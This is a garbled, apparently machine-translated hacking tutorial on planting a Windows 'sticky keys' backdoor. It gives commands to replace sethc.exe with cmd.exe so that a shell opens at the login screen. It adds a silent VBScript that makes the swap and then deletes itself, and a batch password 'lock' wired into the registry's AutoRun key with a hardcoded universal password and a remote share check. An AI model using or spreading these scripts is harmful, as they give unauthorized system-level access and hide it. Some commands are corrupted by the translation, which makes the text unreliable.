Back door principle:
Under Windows 2000/xp/vista, press the SHIFT key 5 times to open the glue, run the Sethc.exe, and open it in the login interface. This is reminiscent of Windows screensaver, after replacing the program with Cmd.exe, you can open the shell.
Xp:
Eject the installation source CD (or rename the installation directory on your hard disk)
CD%widnir%\system32\dllcache
ren sethc.exe *.ex~
CD%widnir%\system32
copy/y Cmd.exe Sethc.exe
Vista:
takeown/f C:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe/g Administrator:f
Then replace the file by the XP method
In the Login interface Press 5 This shift, come out cmd shell, and then ...
Backdoor Extensions:
Copy Code code as follows:
Dim obj, success
Set obj = CreateObject ("Wscript.Shell")
Success = Obj.run ("cmd/c takeown/f%systemroot%\system32\sethc.exe", 0, True)
Success = Obj.run ("cmd/c Echo y| cacls%systemroot%\system32\sethc.exe/g%username%:f ", 0, True)
Success = Obj.run ("cmd/c copy%systemroot%\system32\cmd.exe%systemroot%\system32\acmd.exe", 0, True)
Success = Obj.run ("cmd/c copy%systemroot%\system32\sethc.exe%systemroot%\system32\asethc.exe", 0, True)
Success = Obj.run ("cmd/c del%systemroot%\system32\sethc.exe", 0, True)
Success = Obj.run ("cmd/c ren%systemroot%\system32\acmd.exe sethc.exe", 0, True)
The second sentence is the most interesting. Auto answer .... I've had a similar problem before.
Update again. Add a self deletion, simplify the code ...
Copy Code code as follows:
On Error Resume Next
Dim obj, success
Set obj = CreateObject ("Wscript.Shell")
Success = Obj.run ("cmd/c takeown/f%systemroot%\system32\sethc.exe&echo y| cacls%systemroot%\system32\sethc.exe/g%username%:f©%systemroot%\system32\cmd.exe%SystemRoot%\system32\acmd.exe ©%systemroot%\system32\sethc.exe%systemroot%\system32\asethc.exe&del%systemroot%\system32\sethc.exe& ren%systemroot%\system32\acmd.exe sethc.exe ", 0, True)
CreateObject ("Scripting.FileSystemObject"). DeleteFile (WScript.ScriptName)
Rear door lock Extension:
Allyesno Note: CMD lock can be used for Cmdshell password verification
The following way to lock the door is to save the code as a Bdlock.bat
You can then modify the registry location to
Copy Code code as follows:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor]
"AutoRun" = "Bdlock.bat"
@Echo off
Title Door Login Verification
Color A
Cls
Set temprandom=%random%
echo Please enter a CAPTCHA:%temprandom%
set/p check=
If "%check%" = = "%temprandom%%temprandom%" goto Passcheck
If "%check%" = = "%temprandom%" (
REM Backdoor Server Authentication
REM If no backdoor authentication server please drop a line of code from REM annotation
If exist \192.168.8.8\backdoor$\pass goto Passcheck
)
echo Validation failed
Pause
Exit
:p Asscheck
Echo Validation Succeeded
If "%passcmdlock%" = = "http://blog.csdn.net/freexploit/" Goto endx
Set passcmdlock=http://blog.csdn.net/freexploit/
: Allyesno
Set Errorlevel=>nul
Echo Please enter a validation password?
Set Password=allyesno is a Pig>nul
set/p password=
REM Universal Password
If "%password%" = = "Allyesno is a sb" goto ENDX
If%time:~1,1%==0 Set timechange=a
If%time:~1,1%==1 Set timechange=b
If%time:~1,1%==2 Set Timechange=c
If%time:~1,1%==3 Set Timechange=d
If%time:~1,1%==4 Set timechange=e
If%time:~1,1%==5 Set timechange=f
If%time:~1,1%==6 Set timechange=g
If%time:~1,1%==7 Set timechange=h
If%time:~1,1%==8 Set timechange=i
If%time:~1,1%==9 Set Timechange=j
set/a sum=%time:~1,1%+%time:~1,1%
Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$" >nul
If "%errorlevel%" = = "0" Cls&echo password correct &goto end
Echo please contact customer service for correct password! &goto Allyesno
: End
Set Password=>nul
Set Errorlevel=>nul
Echo
: EndX
